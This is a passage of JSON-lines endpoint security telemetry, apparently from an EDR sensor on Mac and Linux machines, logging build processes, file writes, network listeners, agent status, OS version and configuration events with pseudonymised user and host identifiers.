a108bd4bc564d7f3b029cfe399cd0863f6958103f10b780ae9e16793cf601793a58523cbc231e7e3c9eecc0ba8398a63d0fba883f7d63883dd254613c14c4483f349ba63ef0b0f24003aa263c49afe23b23d70abb875d573cde3fbc3e1a9fbe3bebcc6c3b19d0203c92641b3c402f303b62d1f23d0366513d1797ccba9f40a33b32c83f3c39a1773ccfe9b83b2276b8ba786f1235192b55bcb890d63573a8ab34a531f734c11ccb3495400732a151a8369df96936179953bbbc1f00340207b734553ec134b523e7352bd356bba8e2e3bc4df26733a7cdeb36e51c1335421b0e3515c299be173eabbc11e647bbb3d4ae328448f533aa5c213046530d357f25dd330432f8bcf290acbbae9ee4bc4669053496f7d534ede333af1ab38733a03ec7346522f2bd23ad19353fd9cfbd2bb44e3392336039250bbe34bb34f73618f0ecbb7701543c50e560356884d0330f9fab31d582ecbc19f5e03510b6ab34e35d66b85ac660bcc582563510d9083490265c3399a707bc84a0e43474d02abba593a3342f209630b98ae7bd11fb4033605e7dbc9e59f33d5f11733dc922533db943183ca5a46a3d5b42463e83bcd33cdd2f1b3f47fcb93bae3a3b3d1ceaf23e6978d53c4836653f03a29c3c9afe1e3e096bba3bde76423cfd4bf13ee1e4f73f1418933e2ee6323df1a9fc3cfe1da83df0d8453d9e7ea63b69f6a93c4083123d8a7c5b3c0266773d2e147b3ce978d53d08ce703facf41f3f510cb32e0d9dfa3df2b0213b2bd5dc3cf77af63d94ee393d782d383de978d53eb404ea3e288ce73c2209ab3f7c91d13eb0d8454010e2193cfc65413c2e53653b0ede553db674d13e6ae7d53d361bb03d1c23b83c579d0a3bd3176a3c4447c33dea161e3d8a67623bd477bc3c2f4f0e3d1e6eeb3dd07c853cd4e8fb3cded2893f42de013f6d4fdf3f276c8b3ee1e4f73f036e2f3fe58adb3e361134404d8c7e3df837b53ef18fc53faa57a83e781d7e402d53263eb8e2193f62339c3e1b089a3f204189400eb9f53fe010623f9395813f6a233a3e81ff2e3f41a9fc3f3013a93e2666663e17dbf53f1b851f3ec666663e9333333ed446743f0e560440889ba64065d2f2ad9a1b883f573eab3dd7a7873edde69b3f3f3b643eed42c43f6a30554087f62b3f92d42c3e83958140435f703f90a71e40d717593e832ca53e19ce073cd0917d3f6374bc3f8a9d1f3f26e9793f088ce73e7333333df34d6a3e8710cb3f34f7663ea20c4a3e1a02753e23bcd33e843fe63f3a36e33f0573eb3ec84b5e3c6685db3cef0ae53d17acc53c0b32cf3d05681f3e0831273c2ff6d33f0a29c73b6a9e6f3b88c60d3deecbfb3baa53fc3e2d91683b6c636b3d66d9bebb8533b13c0a0d353ea91d153ee275253dcc9d9dbc159e623c1d27c43d3ad18d3d145b6c3982b47b3b88051d3d4fe9b83a12e7cfbc579d0a3af0a5f0390a9f2b3f69db233f10b780ae9e5a073cfc26573a5a6b1bbc247ed03c9d7343ba9bb6aa3d0f66a53f7d49523dd35a863c151c5c3f35b5743ef1d14e40047f243c4d9e843b24095fbb87b99d3cdd82fd3e1c28f63beeae9f3b14812c3c91a75d3c40ad043b613f4b3d033c603d195033ba9d8c6d3b307d0b3c3d12453cd234ec3b25375dba904f6e35181195bcba493d35a2674934a531f7352bda363522229033be54dc337b157336151dabbbb5f5f1340207b7345d30d93421b49d34c2b91cbba8e2e3bc4df26733a7cdeb369116e13592f7ea34116278be173eabbc11e647bbb3d4ae328448f533b7f4153046530d359e3e2233d006d8bcf2cf96bbad9ad8bc466905351da01436249e38af17834033a03ec7346522f2bd1ddc1e35d36497bd2bb44e33bf0a47390220d734c2822235531fdebb73ba773c1888f8356884d0330f9fab31d533c2bc195ee135adf23935ab6563b85b06ccbcc84b5e3510d9083490265c33e590e6bc81450f33ce498bbba593a334d1f8602f713b9cbd1930be33605e7dbca3ec033d5d249e3dc85b183dbc115e3ca858793d5c33723e83afb83cdcc63f3f4916873bab47413d1cb6853e6b9f563c49320e3f03eab33c9afe1e3e0aa64c3bdfd6953cfac1d33ee3e4263f14af4f3e2f69443df3b6463cfeda663df2b0213d9faebc3b50678c3c4250723d8c00543c0151a43d2d0e563ce4f7663d0701113fad2bd43f5075f72e0e19d33df5f6fd3b2eb80f3cf487fd3d92e72e3d7842313de944673eb50b0f3e295e9e3c1fd36f3f7d6a163eb15b57401159b43d000a7c3c2d2dcb3b0ecd8e3db4e11e3e6c3c9f3d3adc0a3d1bb0603c52dcb13bd338f83c4100e73de9e1b13d8b53503bd6ece13c2cd9e83d201cd63dd1b7173cda12303cdc725c3f48793e3f6ded293f276c8b3f036e2f3f036e2f3fea0f913e361134404d8c7e3e0189373ef837b53fabc3613e7f62b7403012063eb79a6b3f5e63203e0d4fdf3f204189400de9e23fe010623f90be0e3f6a233a3e81ff2e3f3951833f30902e3e4275253e18793e3f1b851f3ee0f9093e9333333ed446743f045a1d40889ba64065d2f2ad9d19253f573eab3dc692f73ece21963f3f3b643eee2eb23f579a6b407e76c93f92d42c3e83958140435f703f90a71e40d717593e832ca53e25aee63cb7e9103f64c2f83f8a9d1f3f27fcb93f06a7f03e676c8b3de147ae3e884b5e3f27bb303e90cb293e3295ea3e21e4f73e81205c3f3fec573f0573eb3ebec56d3c633eff3cf1800a3d1389b53c0ac1903d0587943e06dc5d3c2efb2b3f095e9e3b67ddca3b80303c3dec8b443ba782903e30068e3b6bcc6c3d619b91bb836eb53c0bf7f03ea60aa63ee00d1b3dcc447cbc28c1553c1d55e73d36e2eb3d132b56399063903b8776813d4d7f0f3a15a1bdbc55cfab3b06f04a39c25a833f68f5c33f107c85ae9e10d83cf9335d3a594a8abc2276b83c9f16b1ba66e57d3d0e0c9e3f7dbf483dd1b7173c1435ad3f34bc6a3ef096bc4003689d3c49afe23b22fcf0bb87a8d63cde939f3e1aee633bedbb5a3b14f69d3c91e6473c402f303b64217d3d06cca33d183516ba9fe8683b33d4ae3c38f9b13cced9173b288f00ba5a42d7356eda97bcb9628d356e0c6f341b95cf341f3c6534ad5b0a32a151a8337b157335b2c72cbbb2852334900adf34553ec1346e5ee5347ab7febba8e2e3bc4df26733a7cdeb35cf19143592f7ea34c9a612be173eabbc11e647bbb3d4ae35219fff33b7f4153046530d348b7aa434677fadbcf290acbbaf2d80bc46690535a6b2cc3206f2a8af17834033a03ec7338e0e59bd1e83e435857ac3bd2bb44e33043df73927249d34bb34f735906b14bb780dc33c50e560361e0a98336f92c2320a0eb4bc19b2c435adf23935ab6563b85a4586bcc56d5d3510d9083490265c3399a707bc811b1e34cde3d7bba593a334aec0612fb676c6bd13be2333605e7dbca3ec033d59be4d3dc9667b3db83cf33ca7ef9e3d5c09813e8361133cdba0a53f485f073ba023213d191bc53e69fbe73c4059213f04dd2f3c9835163e0865953be38a7e3d0385c63ee1b08a3f142c3d3e2f9db23df0068e3cff6d333df06f693d9e7ea63b68fb013c4250723d8a4d2b3c0b007a3d2e924f3cea209b3d094c443faccccd3f50ded32e0d9dfa3df41f213b2dab9f3cf95d4f3d94a4d33d7991bc3de809d53eb532613e28db8c3c1afe1e3f7cd9e83eb0ff974010f0d83cfc3b4f3c2e53653b0ede553db6c3763e6bb98c3d35f1bf3d1a95423c53d85a3bcedd483c46bce83ded5cfb3d8ac0833bd0edc43c319a413d1e30013dd07c853cdcf0303ce243573f4ded293f69c77a3f13d70a3f036e2f3f036e2f3feaa3053e361134404d8c7e3df5c28f3ef02de03faa57a83e70d845402f5dcc3eb8e2193f62339c3df0068e3f204189400de9e23fe010623f90be0e3f6a233a3e7333333f4a85883f3318fc3e4000003e063f143f1b851f3ecb5dcc3e9333333ed446743f0e560440889ba64065d2f2ad8f49d23f573eab3dbeff193ed7f62b3f3f3b643eedab9f3f57d567409780343f9292a33e8395814041158c3f90a71e40d717593e832ca53e1a511a3c74c6e73f64c2f83f832cf93f26e9793f03a92a3e6872b03df34d6a3e884b5e3f3381d83ea20c4a3e1a02753e2353f83e825aee3f4d013b3f041f213ec240b83c6a4a8c3cf3a14d3d15b5743c091e213d059c8d3e08ce703c2f78ff3f0837b53b6a7ce13b815e393ded91683ba9cdc43e2d42c43b73dc053d6147aebb8438093c0a61173ea72b023edf559b3dcaff6dbc1bd4063c21fd153d39ffd63d128e0d398d4bad3b894c443d4f18013a195aafbc5773193af57f7339ce41413f6851ec3f0fec57ae9dfa533cfa58f73a5a0d27bc21943a3ca1dfb9ba5471063d0e56043f7dd2f23dd1b7173c14b3813f33dd983ef013a9400347d83c4ca2db3b245d42bb8733663ce243573e1b22d13bf47b673b0f32383c928e0d3c4059213b6304473d05143c3d176ddbba9aed573b3220793c3c6a7f3ccc4ef93b267621ba298e0334f8d6f4bcba493d35461af9342ca85e34c11ccb352222903385f5c5368e9b3935b2c72cbbb75ea6344cfa3134553ec134b523e734c2b91cbba8e2e3bc4df26734d636243705eeb9351ad56535332082be173eabbc11ea79bbb3d4ae35a82cc133a943c13046530d34fd74ee34677fadbcf27bb3bbad8a11bc4669053496f7d53580f4d6af1848493405e546338e0e59bd23ad193400bddcbd2bb44e33bf0a473927249d34c2822235531fdebb73ba773c626d4836cf4407330f9fab31d582ecbc1a027535b8af0035d13ed5b85ad11cbcc582563573cb0735d499d3319cda2abc8548aa3474d02abba593a3351ccb0c2f713b9cbd14a4d333605e7dbca3ec033d6108c43dc9e4503dba34443ca454de3d5a511a3e84816f3cdc09813f4773193bac3a863d1945b73e6b1c433c48de2b3f03e4263c9a415f3e08b4393bd8ba413d0073583ee1cac13f13a92a3e2e48e93df318fc3d0216c63df212d73d9d7dbf3b627e0f3c44ef893d8ba1f53c03e8573d2c9afe3ce5f30e3d0846203fac710d3f50c49c2e0d4f2a3df487fd3b306c443cf837b53d96ffc13d795d4f3de8db8c3eb4bc6a3e28a71e3c1fba453f7c56d63eb07c854010c63f3cfeb0753c3170503b0e68e43db977853e6bb98c3d3c7f783d19a4163c55f99c3bd1e96c3c4669053debb98c3d8a6ca03bde43ee3c2efb2b3d2007dd3dce075f3cdbb59e3ce75793b01aa501","event_simpleName":"DeliverLocalFXToCloud","ConfigStateHash":"1620585913","aip":"67.43.156.14","ModelPrediction":"1436899696705536","SHA256HashData":"c89caf538788e6524bf4ae93194051f3389eecbc71e4793f12a2dc0368211cc2","Malicious":"0","ConfigBuild":"1007.4.0013701.1","FeatureExtractionVersion":"2","event_platform":"Mac","FXFileSize":"502032","Entitlements":"15","name":"DeliverLocalFXToCloudMacV4","PupAdwareDecisionValue":"12384657383358464","id":"ffffffff-1111-11eb-b44e-069a02b0ad6b","PupAdwareConfidence":"0","EffectiveTransmissionClass":"1","aid":"ffffffff45d647e6ae0ba8764a4bd570","MLModelVersion":"4","timestamp":"1625677489052","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"CreateProcessArgs","ContextTimeStamp":"1625677524.929","ConfigStateHash":"3090255842","ContextProcessId":"365035560818271291","ContextThreadId":"365035560818271291","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","CommandLine":"t.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/CategorySurfaceViewController.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationActionView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationAddressView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationErrorView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationHeaderView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationLoadingView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationPostalCodeView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationViewController.o -index-store-path /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Index/DataStore -index-system-modules","Entitlements":"15","name":"CreateProcessArgsMac","id":"ffffffff-1111-11eb-8332-020506b18db5","EffectiveTransmissionClass":"2","aid":"ffffffffb3a3442585c05abc61e290fc","timestamp":"1625677525128","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/bin/swift-frontend"} +{"event_simpleName":"PdfFileWritten","ContextTimeStamp":"1625677488.523","ConfigStateHash":"3090255842","ContextProcessId":"364156540965623394","ContextThreadId":"0","aip":"67.43.156.13","FileIdentifier":"05000001000000000000000000000000f1321d0000000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"PdfFileWrittenMacV1","id":"ffffffff-1111-11eb-8903-022a1941b91f","EffectiveTransmissionClass":"2","aid":"ffffffffc4044541995bffd84b9df003","timestamp":"1625677488576","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/folders/pt/s9pzbbwd07q_0fxqvfhc513r0000gp/T/com.microsoft.Excel/Content.MSO/mso6ACABA95"} +{"event_simpleName":"GroupIdentity","GID":"242","AuthenticationUuidAsString":"ABCDEFAB-CDEF-ABCD-EFAB-CDEF000000F2","ConfigStateHash":"3967242894","aip":"67.43.156.13","AuthenticationId":"1119489580471877843","UserPrincipal":"user2@dom1","UserSid":"S-1-5-21-3852557355-3178143607-2040168074-1485","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"GroupIdentityMacV2","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","AuthenticationUuid":"ABCDEFAB-CDEF-ABCD-EFAB-CDEF000000F2","timestamp":"1625677478379","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"MachOFileWritten","ContextTimeStamp":"1625622611.845","ConfigStateHash":"3967242894","MachOSubType":"3","ContextProcessId":"364938429384226082","Size":"0","ContextThreadId":"0","aip":"67.43.156.13","SHA256HashData":"c0f50d27fe9fb31e33d1ce6577eeb4d4e17639095ad20575da018d1fcf955198","FileIdentifier":"04000001000000000000000000000000ac41270400000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"MachOFileWrittenMacV3","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","timestamp":"1625677479336","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/folders/bf/dwpvdj3d1tq00l8fgs5rd7x00000gn/T/.net.example.desktop.ev80yl"} +{"event_simpleName":"NetworkListenIP6","ContextTimeStamp":"1625622608.014","LocalAddressIP6":"0:0:0:0:0:0:0:0","RemoteAddressIP6":"0:0:0:0:0:0:0:0","ConfigStateHash":"3967242894","ConnectionFlags":"0","ContextProcessId":"364938390018585510","RemotePort":"0","aip":"67.43.156.13","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"8770","Entitlements":"15","name":"NetworkListenIP6MacV10","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff44564c2f8d76394cb25c31ab","ConnectionDirection":"2","InContext":"0","timestamp":"1625677478929","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"CurrentSystemTags","ConfigStateHash":"3090255842","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","SystemTableIndex":"0","Entitlements":"15","name":"CurrentSystemTagsMacV1","id":"ffffffff-1111-11eb-b88d-06b7cb0d7bd7","EffectiveTransmissionClass":"0","aid":"ffffffff62714a708030d494ca0a7e60","Tags":"312, 11544872091698, 21990232555653, 21990232555859, 26388279066700, 26388279066703, 26388279066704, 26388279066705, 26388279066708, 26388279066849, 26388279066855, 26388279066948, 26388279066958, 26388279066970, 26388279067150, 26388279067174, 26388279067175, 26405458935929, 26405458935963, 26405458935964, 26405458936063, 26405458936087, 26405458936088, 26405458936130, 26405458936163, 26405458936164, 26405458936166, 26405458936167, 26405458936242, 26405458936306, 26405458936307, 26405458936357, 26405458936510, 26405458936511, 26405458936522, 26405458936523, 26422638805193, 26422638805230, 26422638805244, 26422638805245, 26422638805246, 26439818674539, 26439818674540, 26439818674541, 26439818674542, 26439818674543, 26439818674544, 26439818674614, 26439818674615, 26439818674616, 26439818674617, 26439818674678, 26439818674679, 26439818674680, 26439818674882, 26439818674883, 26439818674884, 26439818674894, 26439818674895, 26439818674896, 26456998543646, 26456998543647, 26456998543648, 26456998543649, 26456998543650, 26456998543651, 26456998543652, 26456998543653, 26456998543654, 26456998543656, 26456998543721, 26456998543722, 26456998543744, 26456998543793, 26456998543811, 26456998543903, 26456998543904, 26456998543950, 26456998543963, 26456998544000, 26456998544045, 26456998544086, 26456998544087, 26456998544115, 30803505447073, 30803505447074, 30803505447075, 30803505447076, 30803505447077, 30803505447078, 30803505447194, 30803505447195, 30803505447196, 30803505447528, 30803505447529, 30803505447530, 30803505447532, 30803505447533, 30803505447534, 30803505447537, 30803505447538, 30803505447539, 30803505447541, 30803505447542, 30803505447543, 30803505447567, 30803505447568, 30803505447569, 30803505447571, 30803505447572, 30803505447573, 30803505447575, 30803505447576, 30803505447577, 30803505447579, 30803505447580, 30803505447581, 30803505447583, 30803505447584","timestamp":"1625677502693","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"NewExecutableWritten","ContextTimeStamp":"1625677533.027","ConfigStateHash":"1620585913","ContextProcessId":"362208380891022165","Size":"596224","ContextThreadId":"0","aip":"67.43.156.14","SHA256HashData":"70a06a11057efb22285a7200a53e5b6bae001fe0a98d4b23d0f6a31ad818a005","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"NewExecutableWrittenMacV2","id":"ffffffff-1111-11eb-985c-02152dd35bc1","EffectiveTransmissionClass":"2","aid":"ffffffff28414c2293e35c360213e723","timestamp":"1625677533060","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/folders/3c/z7j1h7dx3nz3xkl10c1vyxgh0000gp/T/.com.google.Chrome.CVG7Ya/Zoom.app/Contents/MacOS/app_mode_loader","VnodeModificationType":"0"} +{"event_simpleName":"LfoUploadDataComplete","LfoUploadFlags":"4","AttemptNumber":"0","ConfigStateHash":"3090255842","SourceFileName":"/Users/user5/.rbenv/versions/2.6.5/bin/ruby","Size":"3876424","aip":"67.43.156.14","SHA256HashData":"d7b56e2a06304ecd343985a1aaedff2eb32ee1151bba0e152aff97c778b7562a","UploadId":"8023668629276690295","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"LfoUploadDataCompleteMacV3","id":"ffffffff-1111-11eb-a2ab-024aafff599f","EffectiveTransmissionClass":"2","aid":"fffffffffbea48169985c2c2bae89d1d","Tags":"312, 11544872091698, 21990232555653, 21990232555859, 26388279066700, 26388279066703, 26388279066704, 26388279066705, 26388279066708, 26388279066849, 26388279066855, 26388279066948, 26388279066958, 26388279066970, 26388279067150, 26388279067174, 26388279067175, 26405458935929, 26405458935963, 26405458935964, 26405458936063, 26405458936087, 26405458936088, 26405458936130, 26405458936163, 26405458936164, 26405458936166, 26405458936167, 26405458936242, 26405458936306, 26405458936307, 26405458936357, 26405458936510, 26405458936511, 26405458936522, 26405458936523, 26422638805193, 26422638805230, 26422638805244, 26422638805245, 26422638805246, 26439818674539, 26439818674540, 26439818674541, 26439818674542, 26439818674543, 26439818674544, 26439818674614, 26439818674615, 26439818674616, 26439818674617, 26439818674678, 26439818674679, 26439818674680, 26439818674882, 26439818674883, 26439818674884, 26439818674894, 26439818674895, 26439818674896, 26456998543646, 26456998543647, 26456998543648, 26456998543649, 26456998543650, 26456998543651, 26456998543652, 26456998543653, 26456998543654, 26456998543656, 26456998543721, 26456998543722, 26456998543744, 26456998543793, 26456998543811, 26456998543903, 26456998543904, 26456998543950, 26456998543963, 26456998544000, 26456998544045, 26456998544086, 26456998544087, 26456998544115, 30803505447073, 30803505447074, 30803505447075, 30803505447076, 30803505447077, 30803505447078, 30803505447194, 30803505447195, 30803505447196, 30803505447528, 30803505447529, 30803505447530, 30803505447532, 30803505447533, 30803505447534, 30803505447537, 30803505447538, 30803505447539, 30803505447541, 30803505447542, 30803505447543, 30803505447567, 30803505447568, 30803505447569, 30803505447571, 30803505447572, 30803505447573, 30803505447575, 30803505447576, 30803505447577, 30803505447579, 30803505447580, 30803505447581, 30803505447583, 30803505447584","timestamp":"1625677428827","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"LightningLatencyInfo","LightningLatencyState":"3","ConfigStateHash":"3090255842","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"LightningLatencyInfoMacV1","id":"ffffffff-1111-11eb-b44e-069a02b0ad6b","EffectiveTransmissionClass":"0","aid":"ffffffffd452449b8d1eb7d85b146650","timestamp":"1625677453146","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"NeighborListIP4","ConfigStateHash":"1620585913","NeighborList":"40-C7-29-FF-FF-FF|192.168.2.1|1|64-9A-BE-FF-FF-FF|192.168.2.10|0|F0-FF-FF-FF-A0-14|192.168.2.43|0|DE-58-FF-FF-5D-3B|192.168.2.113|0|5E-AA-FF-FF-FF-20|192.168.2.128|0|44-FF-FF-FF-03-DD|192.168.2.136|0|EE-74-EE-EE-FF-0D|192.168.2.137|0|3A-FF-FF-FF-03-26|192.168.2.144|0|DE-79-FF-FF-FF-D4|192.168.2.145|0|0E-24-FF-EE-EE-87|192.168.2.152|0|CC-D9-AC-AF-66-F8|192.168.2.153|0|","aip":"67.43.156.14","InterfaceIndex":"6","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"NeighborListIP4MacV1","id":"ffffffff-1111-11eb-9dc0-06c6f5278873","EffectiveTransmissionClass":"3","aid":"ffffffff8eb649cf8d82be1e65629a0e","timestamp":"1625677450083","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"ZipFileWritten","ContextTimeStamp":"1625677454.557","ConfigStateHash":"3090255842","ContextProcessId":"365039419134863763","ContextThreadId":"0","aip":"67.43.156.14","FileIdentifier":"07000001000000000000000000000000b1445a0900000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"ZipFileWrittenMacV1","id":"ffffffff-1111-11eb-ab6e-0668ec51180b","EffectiveTransmissionClass":"2","aid":"ffffffff2d984e32b702789b54f0f811","timestamp":"1625677454723","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user6/Library/Developer/CoreSimulator/Devices/BCE6B46B-E863-4151-AA9D-D71C79438C47/data/Containers/Data/Application/1249A061-F246-4338-AE56-4373E918C9B4/Library/Application Support/com.instacart.instashopper/LogCache/2021-07-06T23:44:46.133Z.zip"} +{"AgentVersion":"6.24.13701.0","aip":"67.43.156.14","ConfigIDBase":"65994753","BiosReleaseDate":"01/06/2021","CpuFeaturesMask":"7494065083858915","ChasisManufacturer":"Apple Inc.","SystemSerialNumber":"C02F649EMD6R","event_platform":"Mac","AgentLoadFlags":"0","CpuVendor":"0","id":"ffffffff-1111-11eb-b3de-06a53f021cc9","BiosVersion":"1554.80.3.0.0 (iBridge: 18.16.14347.0.0,0)","CpuSignature":"591594","EffectiveTransmissionClass":"0","MoboProductName":"Mac-E1008331FDC96864","timestamp":"1625677460451","MicrocodeSignature":"16045690984229358334","event_simpleName":"AgentOnline","ContextTimeStamp":"1625677445.731","SystemProductName":"MacBookPro16,1","MoboManufacturer":"Apple Inc.","ConfigStateHash":"3967242894","ConfigBuild":"1007.4.0013701.1","SystemSku":" ","SensorGroupingTags":"","ConfigurationVersion":"10","AgentLocalTime":"1625677445.731","BiosManufacturer":"Apple Inc.","Entitlements":"15","name":"AgentOnlineMacV13","ConfigIDPlatform":"4","ComputerName":"comp2","ChassisType":"9","ConfigIDBuild":"13701","SystemManufacturer":"Apple Inc.","aid":"ffffffffbea440b9aad8b5bf222d303f","ProvisionState":"1","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"Zero"} +{"event_simpleName":"CriticalFileAccessed","ContextTimeStamp":"1625677438.515","GID":"0","ConfigStateHash":"3090255842","ContextProcessId":"365053399098988534","ContextThreadId":"0","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","UID":"0","event_platform":"Mac","UnixMode":"384","Entitlements":"15","name":"CriticalFileAccessedMacV1","id":"ffffffff-1111-11eb-956a-02748d01bd3d","EffectiveTransmissionClass":"2","aid":"ffffffff8eca418b7a861be9c5f7de1d","timestamp":"1625677438553","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/db/dslocal/nodes/Default/users/daemon.plist"} +{"MajorVersion":"19","event_simpleName":"OsVersionInfo","OSVersionFileData":"3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0a3c21444f435459504520706c697374205055424c494320222d2f2f4170706c652f2f44544420504c49535420312e302f2f454e222022687474703a2f2f7777772e6170706c652e636f6d2f445444732f50726f70657274794c6973742d312e302e647464223e0a3c706c6973742076657273696f6e3d22312e30223e0a3c646963743e0a093c6b65793e50726f647563744275696c6456657273696f6e3c2f6b65793e0a093c737472696e673e3139483532343c2f737472696e673e0a093c6b65793e50726f64756374436f707972696768743c2f6b65793e0a093c737472696e673e313938332d32303231204170706c6520496e632e3c2f737472696e673e0a093c6b65793e50726f647563744e616d653c2f6b65793e0a093c737472696e673e4d6163204f5320583c2f737472696e673e0a093c6b65793e50726f647563745573657256697369626c6556657273696f6e3c2f6b65793e0a093c737472696e673e31302e31352e373c2f737472696e673e0a093c6b65793e50726f6475637456657273696f6e3c2f6b65793e0a093c737472696e673e31302e31352e373c2f737472696e673e0a093c6b65793e694f53537570706f727456657273696f6e3c2f6b65793e0a093c737472696e673e31332e363c2f737472696e673e0a3c2f646963743e0a3c2f706c6973743e0a","ConfigStateHash":"3967242894","AgentVersion":"6.24.13701.0","aip":"67.43.156.14","MinorVersion":"6","OSVersionString":"Darwin Kernel Version 19.6.0: Tue Jan 12 22:13:05 PST 2021; root:xnu-6153.141.16~1/RELEASE_X86_64","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"OsVersionInfoMacV3","RFMState":"0","id":"ffffffff-1111-11eb-b3de-06a53f021cc9","OSVersionFileName":"/System/Library/CoreServices/SystemVersion.plist","EffectiveTransmissionClass":"2","aid":"ffffffffbea440b9aad8b5bf222d303f","timestamp":"1625677462356","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"ConfigBuild":"1007.8.0010912.1","event_simpleName":"ConfigStateUpdate","event_platform":"Lin","ConfigStateHash":"1284133626","ConfigStateData":"0,0,1007.8.0010912.1|1,c,0|1,10,1|1,11,0|1,12,1|1,13,1|1,14,19|1,15,3|1,1f,4|1,22,3|1,3b,1|1,59,2d|1,d3,263|1,d4,0|1,eb,36|1,201,1|2,0,a8000000032,140000000085,18000000004c,18000000004f,180000000054,18000000022a,180000000248,180000000279,18000000027a,1800000002b4,180400000079,180400000225,180c00000133,180c00000285,181000000128,181000000180,18100000021f,181000000220,181000000280,1c0400000205|","name":"ConfigStateUpdateLinV1","aip":"67.43.156.14","id":"ffffffff-1111-11eb-8e88-068a8894a447","aid":"ffffffff4f4044b689d6420d303e4ecd","timestamp":"1625677436454","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"LFODownloadConfirmation","ConfigStateHash":"1333055909","aip":"67.43.156.14","DownloadServer":"lfodown01-b.cloudsink.net","DownloadPath":"/osfm/linux/bde98295e6e5fa4c6ba2acfebc2e9943c836bf2223aebb8b29e03c44df43cb53","DownloadPort":"443","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","name":"LFODownloadConfirmationLinV1","CompletionEventId":"Event_KmaExtDownloadCompleteLinV1","id":"ffffffff-1111-11eb-8dee-0201f64cca29","aid":"ffffffff88b948c6abeeee910f6d8c33","timestamp":"1625677365906","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"KernelModuleArchiveExt11611"} 